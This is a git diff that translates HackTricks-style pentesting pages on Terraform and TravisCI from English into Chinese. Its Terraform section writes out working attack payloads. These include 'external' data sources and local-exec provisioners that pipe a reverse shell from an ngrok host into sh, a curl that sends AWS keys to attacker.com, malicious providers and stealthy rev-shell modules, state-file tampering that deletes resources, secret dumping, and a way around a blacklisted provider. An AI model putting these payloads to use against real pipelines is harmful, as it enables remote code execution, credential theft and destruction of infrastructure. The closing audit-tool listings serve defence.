+HashiCorp 和 Terraform 社区已经编写了 **超过 1700 个提供程序** 来管理成千上万种不同类型的资源和服务,这个数字还在不断增长。您可以在 [Terraform Registry](https://registry.terraform.io/) 上找到所有公开可用的提供程序,包括亚马逊网络服务 (AWS)、Azure、谷歌云平台 (GCP)、Kubernetes、Helm、GitHub、Splunk、DataDog 等等。
-The core Terraform workflow consists of three stages:
+核心 Terraform 工作流程由三个阶段组成:
-- **Write:** You define resources, which may be across multiple cloud providers and services. For example, you might create a configuration to deploy an application on virtual machines in a Virtual Private Cloud (VPC) network with security groups and a load balancer.
-- **Plan:** Terraform creates an execution plan describing the infrastructure it will create, update, or destroy based on the existing infrastructure and your configuration.
-- **Apply:** On approval, Terraform performs the proposed operations in the correct order, respecting any resource dependencies. For example, if you update the properties of a VPC and change the number of virtual machines in that VPC, Terraform will recreate the VPC before scaling the virtual machines.
+- **编写:** 您定义资源,这些资源可能跨多个云提供商和服务。例如,您可能会创建一个配置,以在具有安全组和负载均衡器的虚拟私有云 (VPC) 网络中的虚拟机上部署应用程序。
+- **计划:** Terraform 创建一个执行计划,描述它将根据现有基础设施和您的配置创建、更新或销毁的基础设施。
+- **应用:** 经批准后,Terraform 按照正确的顺序执行提议的操作,尊重任何资源依赖关系。例如,如果您更新 VPC 的属性并更改该 VPC 中虚拟机的数量,Terraform 将在扩展虚拟机之前重新创建 VPC。
.png>)
-### Terraform Lab
+### Terraform 实验室
-Just install terraform in your computer.
+只需在您的计算机上安装 terraform。
-Here you have a [guide](https://learn.hashicorp.com/tutorials/terraform/install-cli) and here you have the [best way to download terraform](https://www.terraform.io/downloads).
+这里有一个 [指南](https://learn.hashicorp.com/tutorials/terraform/install-cli),这里有 [下载 terraform 的最佳方式](https://www.terraform.io/downloads)。
-## RCE in Terraform
+## Terraform 中的 RCE
-Terraform **doesn't have a platform exposing a web page or a network service** we can enumerate, therefore, the only way to compromise terraform is to **be able to add/modify terraform configuration files**.
+Terraform **没有暴露网页或网络服务的平台**,因此,妥协 terraform 的唯一方法是 **能够添加/修改 terraform 配置文件**。
-However, terraform is a **very sensitive component** to compromise because it will have **privileged access** to different locations so it can work properly.
+然而,terraform 是一个 **非常敏感的组件**,因为它将拥有 **特权访问** 不同位置,以便正常工作。
-The main way for an attacker to be able to compromise the system where terraform is running is to **compromise the repository that stores terraform configurations**, because at some point they are going to be **interpreted**.
+攻击者能够妥协运行 terraform 的系统的主要方式是 **妥协存储 terraform 配置的仓库**,因为在某些时候它们将被 **解释**。
-Actually, there are solutions out there that **execute terraform plan/apply automatically after a PR** is created, such as **Atlantis**:
+实际上,市面上有一些解决方案 **在创建 PR 后自动执行 terraform plan/apply**,例如 **Atlantis**:
{{#ref}}
atlantis-security.md
{{#endref}}
-If you are able to compromise a terraform file there are different ways you can perform RCE when someone executed `terraform plan` or `terraform apply`.
+如果您能够妥协一个 terraform 文件,有不同的方法可以在某人执行 `terraform plan` 或 `terraform apply` 时执行 RCE。
### Terraform plan
-Terraform plan is the **most used command** in terraform and developers/solutions using terraform call it all the time, so the **easiest way to get RCE** is to make sure you poison a terraform config file that will execute arbitrary commands in a `terraform plan`.
+Terraform plan 是 terraform 中 **使用最频繁的命令**,开发人员/使用 terraform 的解决方案一直在调用它,因此,**获得 RCE 的最简单方法**是确保您毒化一个 terraform 配置文件,该文件将在 `terraform plan` 中执行任意命令。
-**Using an external provider**
+**使用外部提供程序**
-Terraform offers the [`external` provider](https://registry.terraform.io/providers/hashicorp/external/latest/docs) which provides a way to interface between Terraform and external programs. You can use the `external` data source to run arbitrary code during a `plan`.
-
-Injecting in a terraform config file something like the following will execute a rev shell when executing `terraform plan`:
+Terraform 提供了 [`external` 提供程序](https://registry.terraform.io/providers/hashicorp/external/latest/docs),它提供了一种在 Terraform 和外部程序之间进行接口的方法。您可以使用 `external` 数据源在 `plan` 期间运行任意代码。
+在 terraform 配置文件中注入如下内容将在执行 `terraform plan` 时执行一个反向 shell:
```javascript
data "external" "example" {
- program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
+program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
}
```
+**使用自定义提供程序**
-**Using a custom provider**
-
-An attacker could send a [custom provider](https://learn.hashicorp.com/tutorials/terraform/provider-setup) to the [Terraform Registry](https://registry.terraform.io/) and then add it to the Terraform code in a feature branch ([example from here](https://alex.kaskaso.li/post/terraform-plan-rce)):
-
+攻击者可以将一个 [custom provider](https://learn.hashicorp.com/tutorials/terraform/provider-setup) 发送到 [Terraform Registry](https://registry.terraform.io/),然后将其添加到功能分支中的 Terraform 代码中 ([example from here](https://alex.kaskaso.li/post/terraform-plan-rce)):
```javascript
- terraform {
- required_providers {
- evil = {
- source = "evil/evil"
- version = "1.0"
- }
- }
- }
+terraform {
+required_providers {
+evil = {
+source = "evil/evil"
+version = "1.0"
+}
+}
+}
provider "evil" {}
```
+提供程序在 `init` 中下载,并将在执行 `plan` 时运行恶意代码
-The provider is downloaded in the `init` and will run the malicious code when `plan` is executed
+您可以在 [https://github.com/rung/terraform-provider-cmdexec](https://github.com/rung/terraform-provider-cmdexec) 找到一个示例
-You can find an example in [https://github.com/rung/terraform-provider-cmdexec](https://github.com/rung/terraform-provider-cmdexec)
+**使用外部引用**
-**Using an external reference**
-
-Both mentioned options are useful but not very stealthy (the second is more stealthy but more complex than the first one). You can perform this attack even in a **stealthier way**, by following this suggestions:
-
-- Instead of adding the rev shell directly into the terraform file, you can **load an external resource** that contains the rev shell:
+上述两种选项都很有用,但不够隐蔽(第二种比第一种更隐蔽,但更复杂)。您可以通过遵循以下建议以**更隐蔽的方式**执行此攻击:
+- 不要直接将反向 shell 添加到 terraform 文件中,您可以**加载一个包含反向 shell 的外部资源**:
```javascript
module "not_rev_shell" {
- source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules"
+source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules"
}
```
+您可以在 [https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules) 找到 rev shell 代码。
-You can find the rev shell code in [https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules)
-
-- In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b`
+- 在外部资源中,使用 **ref** 功能来隐藏 **repo 中分支的 terraform rev shell 代码**,类似于: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b`
### Terraform Apply
-Terraform apply will be executed to apply all the changes, you can also abuse it to obtain RCE injecting **a malicious Terraform file with** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\
-You just need to make sure some payload like the following ones ends in the `main.tf` file:
-
+将执行 Terraform apply 以应用所有更改,您也可以利用它通过注入 **一个恶意的 Terraform 文件与** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\
+您只需确保一些有效载荷像以下内容结束于 `main.tf` 文件:
```json
// Payload 1 to just steal a secret
resource "null_resource" "secret_stealer" {
- provisioner "local-exec" {
- command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
- }
+provisioner "local-exec" {
+command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
+}
}
// Payload 2 to get a rev shell
resource "null_resource" "rev_shell" {
- provisioner "local-exec" {
- command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'"
- }
+provisioner "local-exec" {
+command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'"
+}
}
```
-
-Follow the **suggestions from the previous technique** the perform this attack in a **stealthier way using external references**.
+遵循**前一种技术的建议**,以**更隐蔽的方式使用外部引用**执行此攻击。
## Secrets Dumps
-You can have **secret values used by terraform dumped** running `terraform apply` by adding to the terraform file something like:
-
+您可以通过运行 `terraform apply` 来**转储 terraform 使用的秘密值**,方法是向 terraform 文件中添加如下内容:
```json
output "dotoken" {
- value = nonsensitive(var.do_token)
+value = nonsensitive(var.do_token)
}
```
+## 滥用 Terraform 状态文件
-## Abusing Terraform State Files
+如果您对 terraform 状态文件具有写入权限但无法更改 terraform 代码,[**这项研究**](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/) 提供了一些有趣的选项来利用该文件:
-In case you have write access over terraform state files but cannot change the terraform code, [**this research**](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/) gives some interesting options to take advantage of the file:
+### 删除资源
-### Deleting resources
+有两种方法可以销毁资源:
-There are 2 ways to destroy resources:
-
-1. **Insert a resource with a random name into the state file pointing to the real resource to destroy**
-
-Because terraform will see that the resource shouldn't exit, it'll destroy it (following the real resource ID indicated). Example from the previous page:
+1. **在状态文件中插入一个随机名称的资源,指向要销毁的真实资源**
+因为 terraform 会看到该资源不应该存在,所以它会销毁它(根据指示的真实资源 ID)。来自上一页的示例:
```json
{
- "mode": "managed",
- "type": "aws_instance",
- "name": "example",
- "provider": "provider[\"registry.terraform.io/hashicorp/aws\"]",
- "instances": [
- {
- "attributes": {
- "id": "i-1234567890abcdefg"
- }
- }
- ]
+"mode": "managed",
+"type": "aws_instance",
+"name": "example",
+"provider": "provider[\"registry.terraform.io/hashicorp/aws\"]",
+"instances": [
+{
+"attributes": {
+"id": "i-1234567890abcdefg"
+}
+}
+]
},
```
+2. **以一种无法更新的方式修改要删除的资源(这样它将被删除并重新创建)**
-2. **Modify the resource to delete in a way that it's not possible to update (so it'll be deleted a recreated)**
-
-For an EC2 instance, modifying the type of the instance is enough to make terraform delete a recreate it.
+对于 EC2 实例,修改实例的类型足以使 terraform 删除并重新创建它。
### RCE
-It's also possible to [create a custom provider](https://developer.hashicorp.com/terraform/tutorials/providers-plugin-framework/providers-plugin-framework-provider) and just replace one of the providers in the terraform state file for the malicious one or add an empty resource with the malicious provider. Example from the original research:
-
+还可以 [创建自定义提供程序](https://developer.hashicorp.com/terraform/tutorials/providers-plugin-framework/providers-plugin-framework-provider),并仅替换 terraform 状态文件中的一个提供程序为恶意提供程序,或添加一个带有恶意提供程序的空资源。原始研究的示例:
```json
"resources": [
{
- "mode": "managed",
- "type": "scaffolding_example",
- "name": "example",
- "provider": "provider[\"registry.terraform.io/dagrz/terrarizer\"]",
- "instances": [
+"mode": "managed",
+"type": "scaffolding_example",
+"name": "example",
+"provider": "provider[\"registry.terraform.io/dagrz/terrarizer\"]",
+"instances": [
- ]
+]
},
```
+### 替换黑名单提供者
-### Replace blacklisted provider
-
-In case you encounter a situation where `hashicorp/external` was blacklisted, you can re-implement the `external` provider by doing the following. Note: We use a fork of external provider published by https://registry.terraform.io/providers/nazarewk/external/latest. You can publish your own fork or re-implementation as well.
-
+如果您遇到 `hashicorp/external` 被列入黑名单的情况,可以通过以下方式重新实现 `external` 提供者。注意:我们使用的是由 https://registry.terraform.io/providers/nazarewk/external/latest 发布的 external 提供者的分支。您也可以发布自己的分支或重新实现。
```terraform
terraform {
- required_providers {
- external = {
- source = "nazarewk/external"
- version = "3.0.0"
- }
- }
+required_providers {
+external = {
+source = "nazarewk/external"
+version = "3.0.0"
+}
+}
}
```
-
-Then you can use `external` as per normal.
-
+然后您可以像往常一样使用 `external`。
```terraform
data "external" "example" {
- program = ["sh", "-c", "whoami"]
+program = ["sh", "-c", "whoami"]
}
```
+## 自动审计工具
-## Automatic Audit Tools
+### [**Snyk 基础设施即代码 (IaC)**](https://snyk.io/product/infrastructure-as-code-security/)
-### [**Snyk Infrastructure as Code (IaC)**](https://snyk.io/product/infrastructure-as-code-security/)
-
-Snyk offers a comprehensive Infrastructure as Code (IaC) scanning solution that detects vulnerabilities and misconfigurations in Terraform, CloudFormation, Kubernetes, and other IaC formats.
-
-- **Features:**
- - Real-time scanning for security vulnerabilities and compliance issues.
- - Integration with version control systems (GitHub, GitLab, Bitbucket).
- - Automated fix pull requests.
- - Detailed remediation advice.
-- **Sign Up:** Create an account on [Snyk](https://snyk.io/).
+Snyk 提供全面的基础设施即代码 (IaC) 扫描解决方案,能够检测 Terraform、CloudFormation、Kubernetes 和其他 IaC 格式中的漏洞和配置错误。
+- **特点:**
+- 实时扫描安全漏洞和合规性问题。
+- 与版本控制系统(GitHub、GitLab、Bitbucket)集成。
+- 自动修复拉取请求。
+- 详细的修复建议。
+- **注册:** 在 [Snyk](https://snyk.io/) 上创建一个账户。
```bash
brew tap snyk/tap
brew install snyk
snyk auth
snyk iac test /path/to/terraform/code
```
-
### [Checkov](https://github.com/bridgecrewio/checkov)
-**Checkov** is a static code analysis tool for infrastructure as code (IaC) and also a software composition analysis (SCA) tool for images and open source packages.
+**Checkov** 是一个用于基础设施即代码 (IaC) 的静态代码分析工具,同时也是一个用于图像和开源包的软件组成分析 (SCA) 工具。
-It scans cloud infrastructure provisioned using [Terraform](https://terraform.io/), [Terraform plan](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Terraform%20Plan%20Scanning.md), [Cloudformation](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Cloudformation.md), [AWS SAM](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/AWS%20SAM.md), [Kubernetes](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kubernetes.md), [Helm charts](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Helm.md), [Kustomize](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kustomize.md), [Dockerfile](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Dockerfile.md), [Serverless](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Serverless%20Framework.md), [Bicep](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Bicep.md), [OpenAPI](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/OpenAPI.md), [ARM Templates](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Azure%20ARM%20templates.md), or [OpenTofu](https://opentofu.org/) and detects security and compliance misconfigurations using graph-based scanning.
-
-It performs [Software Composition Analysis (SCA) scanning](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Sca.md) which is a scan of open source packages and images for Common Vulnerabilities and Exposures (CVEs).
+它扫描使用 [Terraform](https://terraform.io/) 提供的云基础设施、[Terraform plan](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Terraform%20Plan%20Scanning.md)、[Cloudformation](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Cloudformation.md)、[AWS SAM](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/AWS%20SAM.md)、[Kubernetes](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kubernetes.md)、[Helm charts](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Helm.md)、[Kustomize](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kustomize.md)、[Dockerfile](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Dockerfile.md)、[Serverless](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Serverless%20Framework.md)、[Bicep](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Bicep.md)、[OpenAPI](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/OpenAPI.md)、[ARM Templates](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Azure%20ARM%20templates.md) 或 [OpenTofu](https://opentofu.org/) 提供的,并使用基于图形的扫描检测安全和合规性错误配置。
+它执行 [软件组成分析 (SCA) 扫描](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Sca.md),这是对开源包和图像进行的扫描,以查找常见漏洞和暴露 (CVE)。
```bash
pip install checkov
checkov -d /path/to/folder
```
-
### [terraform-compliance](https://github.com/terraform-compliance/cli)
-From the [**docs**](https://github.com/terraform-compliance/cli): `terraform-compliance` is a lightweight, security and compliance focused test framework against terraform to enable negative testing capability for your infrastructure-as-code.
+来自 [**docs**](https://github.com/terraform-compliance/cli):`terraform-compliance` 是一个轻量级的,专注于安全和合规性的测试框架,针对 terraform 以启用基础设施即代码的负面测试能力。
-- **compliance:** Ensure the implemented code is following security standards, your own custom standards
-- **behaviour driven development:** We have BDD for nearly everything, why not for IaC ?
-- **portable:** just install it from `pip` or run it via `docker`. See [Installation](https://terraform-compliance.com/pages/installation/)
-- **pre-deploy:** it validates your code before it is deployed
-- **easy to integrate:** it can run in your pipeline (or in git hooks) to ensure all deployments are validated.
-- **segregation of duty:** you can keep your tests in a different repository where a separate team is responsible.
+- **合规性:** 确保实施的代码遵循安全标准和您自己的自定义标准
+- **行为驱动开发:** 我们几乎为所有事物都采用 BDD,为什么不为 IaC 采用呢?
+- **可移植:** 只需从 `pip` 安装或通过 `docker` 运行。请参见 [安装](https://terraform-compliance.com/pages/installation/)
+- **预部署:** 在代码部署之前进行验证
+- **易于集成:** 它可以在您的管道中运行(或在 git hooks 中),以确保所有部署都经过验证。
+- **职责分离:** 您可以将测试保存在不同的代码库中,由一个独立的团队负责。
> [!NOTE]
-> Unfortunately if the code is using some providers you don't have access to you won't be able to perform the `terraform plan` and run this tool.
-
+> 不幸的是,如果代码使用了一些您没有访问权限的提供者,您将无法执行 `terraform plan` 并运行此工具。
```bash
pip install terraform-compliance
terraform plan -out=plan.out
terraform-compliance -f /path/to/folder
```
-
### [tfsec](https://github.com/aquasecurity/tfsec)
-From the [**docs**](https://github.com/aquasecurity/tfsec): tfsec uses static analysis of your terraform code to spot potential misconfigurations.
-
-- ☁️ Checks for misconfigurations across all major (and some minor) cloud providers
-- ⛔ Hundreds of built-in rules
-- 🪆 Scans modules (local and remote)
-- ➕ Evaluates HCL expressions as well as literal values
-- ↪️ Evaluates Terraform functions e.g. `concat()`
-- 🔗 Evaluates relationships between Terraform resources
-- 🧰 Compatible with the Terraform CDK
-- 🙅 Applies (and embellishes) user-defined Rego policies
-- 📃 Supports multiple output formats: lovely (default), JSON, SARIF, CSV, CheckStyle, JUnit, text, Gif.
-- 🛠️ Configurable (via CLI flags and/or config file)
-- ⚡ Very fast, capable of quickly scanning huge repositories
+来自[**docs**](https://github.com/aquasecurity/tfsec):tfsec使用对您的terraform代码的静态分析来发现潜在的错误配置。
+- ☁️ 检查所有主要(和一些次要)云提供商的错误配置
+- ⛔ 数百条内置规则
+- 🪆 扫描模块(本地和远程)
+- ➕ 评估HCL表达式以及字面值
+- ↪️ 评估Terraform函数,例如`concat()`
+- 🔗 评估Terraform资源之间的关系
+- 🧰 与Terraform CDK兼容
+- 🙅 应用(并美化)用户定义的Rego策略
+- 📃 支持多种输出格式:lovely(默认),JSON,SARIF,CSV,CheckStyle,JUnit,文本,Gif。
+- 🛠️ 可配置(通过CLI标志和/或配置文件)
+- ⚡ 非常快速,能够快速扫描大型代码库
```bash
brew install tfsec
tfsec /path/to/folder
```
-
### [KICKS](https://github.com/Checkmarx/kics)
-Find security vulnerabilities, compliance issues, and infrastructure misconfigurations early in the development cycle of your infrastructure-as-code with **KICS** by Checkmarx.
-
-**KICS** stands for **K**eeping **I**nfrastructure as **C**ode **S**ecure, it is open source and is a must-have for any cloud native project.
+使用 **KICS** 由 Checkmarx 提供的工具,在基础设施即代码的开发周期早期发现安全漏洞、合规性问题和基础设施配置错误。
+**KICS** 代表 **K**eeping **I**nfrastructure as **C**ode **S**ecure,它是开源的,是任何云原生项目的必备工具。
```bash
docker run -t -v $(pwd):/path checkmarx/kics:latest scan -p /path -o "/path/"
```
-
### [Terrascan](https://github.com/tenable/terrascan)
-From the [**docs**](https://github.com/tenable/terrascan): Terrascan is a static code analyzer for Infrastructure as Code. Terrascan allows you to:
-
-- Seamlessly scan infrastructure as code for misconfigurations.
-- Monitor provisioned cloud infrastructure for configuration changes that introduce posture drift, and enables reverting to a secure posture.
-- Detect security vulnerabilities and compliance violations.
-- Mitigate risks before provisioning cloud native infrastructure.
-- Offers flexibility to run locally or integrate with your CI\CD.
+来自[**文档**](https://github.com/tenable/terrascan):Terrascan 是一个用于基础设施即代码的静态代码分析器。Terrascan 允许您:
+- 无缝扫描基础设施即代码中的错误配置。
+- 监控已配置的云基础设施的配置更改,以防止姿态漂移,并能够恢复到安全姿态。
+- 检测安全漏洞和合规性违规。
+- 在配置云原生基础设施之前减轻风险。
+- 提供灵活性,可以在本地运行或与您的 CI\CD 集成。
```bash
brew install terrascan
```
-
-## References
+## 参考文献
- [Atlantis Security](atlantis-security.md)
- [https://alex.kaskaso.li/post/terraform-plan-rce](https://alex.kaskaso.li/post/terraform-plan-rce)
@@ -310,7 +280,3 @@ brew install terrascan
- [https://blog.plerion.com/hacking-terraform-state-privilege-escalation/](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/)
{{#include ../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/todo.md b/src/pentesting-ci-cd/todo.md
index 63a3bb5c8..ce75869eb 100644
--- a/src/pentesting-ci-cd/todo.md
+++ b/src/pentesting-ci-cd/todo.md
@@ -2,7 +2,7 @@
{{#include ../banners/hacktricks-training.md}}
-Github PRs are welcome explaining how to (ab)use those platforms from an attacker perspective
+欢迎提交Github PR,解释如何从攻击者的角度(滥)用这些平台
- Drone
- TeamCity
@@ -11,10 +11,6 @@ Github PRs are welcome explaining how to (ab)use those platforms from an attacke
- Rancher
- Mesosphere
- Radicle
-- Any other CI/CD platform...
+- 任何其他CI/CD平台...
{{#include ../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/travisci-security/README.md b/src/pentesting-ci-cd/travisci-security/README.md
index cff623392..2118a6ebb 100644
--- a/src/pentesting-ci-cd/travisci-security/README.md
+++ b/src/pentesting-ci-cd/travisci-security/README.md
@@ -2,68 +2,64 @@
{{#include ../../banners/hacktricks-training.md}}
-## What is TravisCI
+## 什么是 TravisCI
-**Travis CI** is a **hosted** or on **premises** **continuous integration** service used to build and test software projects hosted on several **different git platform**.
+**Travis CI** 是一个 **托管** 或 **本地** 的 **持续集成** 服务,用于构建和测试托管在多个 **不同 git 平台** 上的软件项目。
{{#ref}}
basic-travisci-information.md
{{#endref}}
-## Attacks
+## 攻击
-### Triggers
+### 触发器
-To launch an attack you first need to know how to trigger a build. By default TravisCI will **trigger a build on pushes and pull requests**:
+要发起攻击,您首先需要知道如何触发构建。默认情况下,TravisCI 会在 **推送和拉取请求** 时 **触发构建**:
.png>)
-#### Cron Jobs
+#### 定时任务
-If you have access to the web application you can **set crons to run the build**, this could be useful for persistence or to trigger a build:
+如果您可以访问该 web 应用程序,您可以 **设置定时任务来运行构建**,这对于持久性或触发构建可能很有用:
.png>)
> [!NOTE]
-> It looks like It's not possible to set crons inside the `.travis.yml` according to [this](https://github.com/travis-ci/travis-ci/issues/9162).
+> 根据 [这个](https://github.com/travis-ci/travis-ci/issues/9162) 的说法,似乎无法在 `.travis.yml` 中设置定时任务。
-### Third Party PR
+### 第三方 PR
-TravisCI by default disables sharing env variables with PRs coming from third parties, but someone might enable it and then you could create PRs to the repo and exfiltrate the secrets:
+TravisCI 默认禁用与来自第三方的 PR 共享环境变量,但有人可能会启用它,然后您可以创建 PR 到该仓库并提取机密:
.png>)
-### Dumping Secrets
+### 转储机密
-As explained in the [**basic information**](basic-travisci-information.md) page, there are 2 types of secrets. **Environment Variables secrets** (which are listed in the web page) and **custom encrypted secrets**, which are stored inside the `.travis.yml` file as base64 (note that both as stored encrypted will end as env variables in the final machines).
+如 [**基本信息**](basic-travisci-information.md) 页面所述,有两种类型的机密。**环境变量机密**(在网页上列出)和 **自定义加密机密**,这些机密存储在 `.travis.yml` 文件中,采用 base64 编码(请注意,两个加密存储的最终都会作为环境变量出现在最终机器上)。
-- To **enumerate secrets** configured as **Environment Variables** go to the **settings** of the **project** and check the list. However, note that all the project env variables set here will appear when triggering a build.
-- To enumerate the **custom encrypted secrets** the best you can do is to **check the `.travis.yml` file**.
-- To **enumerate encrypted files** you can check for **`.enc` files** in the repo, for lines similar to `openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d` in the config file, or for **encrypted iv and keys** in the **Environment Variables** such as:
+- 要 **枚举配置为环境变量的机密**,请转到 **项目** 的 **设置** 并检查列表。但是,请注意,在触发构建时,这里设置的所有项目环境变量都会出现。
+- 要枚举 **自定义加密机密**,您能做的最好是 **检查 `.travis.yml` 文件**。
+- 要 **枚举加密文件**,您可以检查仓库中的 **`.enc` 文件**,查找配置文件中类似于 `openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d` 的行,或在 **环境变量** 中查找 **加密的 iv 和密钥**,例如:
.png>)
-### TODO:
+### 待办事项:
-- Example build with reverse shell running on Windows/Mac/Linux
-- Example build leaking the env base64 encoded in the logs
+- 示例构建在 Windows/Mac/Linux 上运行反向 shell
+- 示例构建在日志中泄露环境变量的 base64 编码
-### TravisCI Enterprise
+### TravisCI 企业版
-If an attacker ends in an environment which uses **TravisCI enterprise** (more info about what this is in the [**basic information**](basic-travisci-information.md#travisci-enterprise)), he will be able to **trigger builds in the the Worker.** This means that an attacker will be able to move laterally to that server from which he could be able to:
+如果攻击者进入一个使用 **TravisCI 企业版** 的环境(有关这是什么的更多信息,请参见 [**基本信息**](basic-travisci-information.md#travisci-enterprise)),他将能够 **在 Worker 中触发构建**。这意味着攻击者将能够从中横向移动到该服务器,从而能够:
-- escape to the host?
-- compromise kubernetes?
-- compromise other machines running in the same network?
-- compromise new cloud credentials?
+- 逃逸到主机?
+- 破坏 kubernetes?
+- 破坏同一网络中运行的其他机器?
+- 破坏新的云凭证?
-## References
+## 参考
- [https://docs.travis-ci.com/user/encrypting-files/](https://docs.travis-ci.com/user/encrypting-files/)
- [https://docs.travis-ci.com/user/best-practices-security](https://docs.travis-ci.com/user/best-practices-security)
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/travisci-security/basic-travisci-information.md b/src/pentesting-ci-cd/travisci-security/basic-travisci-information.md
index 46b10bf38..73b45462a 100644
--- a/src/pentesting-ci-cd/travisci-security/basic-travisci-information.md
+++ b/src/pentesting-ci-cd/travisci-security/basic-travisci-information.md
@@ -4,45 +4,42 @@
## Access
-TravisCI directly integrates with different git platforms such as Github, Bitbucket, Assembla, and Gitlab. It will ask the user to give TravisCI permissions to access the repos he wants to integrate with TravisCI.
+TravisCI 直接与不同的 git 平台集成,如 Github、Bitbucket、Assembla 和 Gitlab。它会要求用户授予 TravisCI 访问他想要与 TravisCI 集成的仓库的权限。
-For example, in Github it will ask for the following permissions:
+例如,在 Github 中,它会请求以下权限:
-- `user:email` (read-only)
-- `read:org` (read-only)
-- `repo`: Grants read and write access to code, commit statuses, collaborators, and deployment statuses for public and private repositories and organizations.
+- `user:email`(只读)
+- `read:org`(只读)
+- `repo`:授予对公共和私有仓库及组织的代码、提交状态、协作者和部署状态的读写访问权限。
## Encrypted Secrets
### Environment Variables
-In TravisCI, as in other CI platforms, it's possible to **save at repo level secrets** that will be saved encrypted and be **decrypted and push in the environment variable** of the machine executing the build.
+在 TravisCI 中,与其他 CI 平台一样,可以 **在仓库级别保存秘密**,这些秘密将被加密保存,并在执行构建的机器的 **环境变量** 中 **解密并推送**。
.png>)
-It's possible to indicate the **branches to which the secrets are going to be available** (by default all) and also if TravisCI **should hide its value** if it appears **in the logs** (by default it will).
+可以指示 **秘密将可用的分支**(默认是所有)以及 TravisCI **是否应该隐藏其值**,如果它出现在 **日志中**(默认会隐藏)。
### Custom Encrypted Secrets
-For **each repo** TravisCI generates an **RSA keypair**, **keeps** the **private** one, and makes the repository’s **public key available** to those who have **access** to the repository.
-
-You can access the public key of one repo with:
+对于 **每个仓库**,TravisCI 生成一个 **RSA 密钥对**,**保留** **私钥**,并将仓库的 **公钥提供给** 有 **访问权限** 的人。
+您可以通过以下方式访问一个仓库的公钥:
```
travis pubkey -r /
travis pubkey -r carlospolop/t-ci-test
```
-
-Then, you can use this setup to **encrypt secrets and add them to your `.travis.yaml`**. The secrets will be **decrypted when the build is run** and accessible in the **environment variables**.
+然后,您可以使用此设置来**加密秘密并将其添加到您的 `.travis.yaml`**。这些秘密将在**构建运行时解密**并可在**环境变量**中访问。
.png>)
-Note that the secrets encrypted this way won't appear listed in the environmental variables of the settings.
+请注意,以这种方式加密的秘密不会出现在设置的环境变量列表中。
-### Custom Encrypted Files
-
-Same way as before, TravisCI also allows to **encrypt files and then decrypt them during the build**:
+### 自定义加密文件
+与之前一样,TravisCI 还允许**加密文件并在构建期间解密它们**:
```
travis encrypt-file super_secret.txt -r carlospolop/t-ci-test
@@ -52,7 +49,7 @@ storing secure env variables for decryption
Please add the following to your build script (before_install stage in your .travis.yml, for instance):
- openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d
+openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d
Pro Tip: You can add it automatically by running with --add.
@@ -60,37 +57,32 @@ Make sure to add super_secret.txt.enc to the git repository.
Make sure not to add super_secret.txt to the git repository.
Commit all changes to your .travis.yml.
```
-
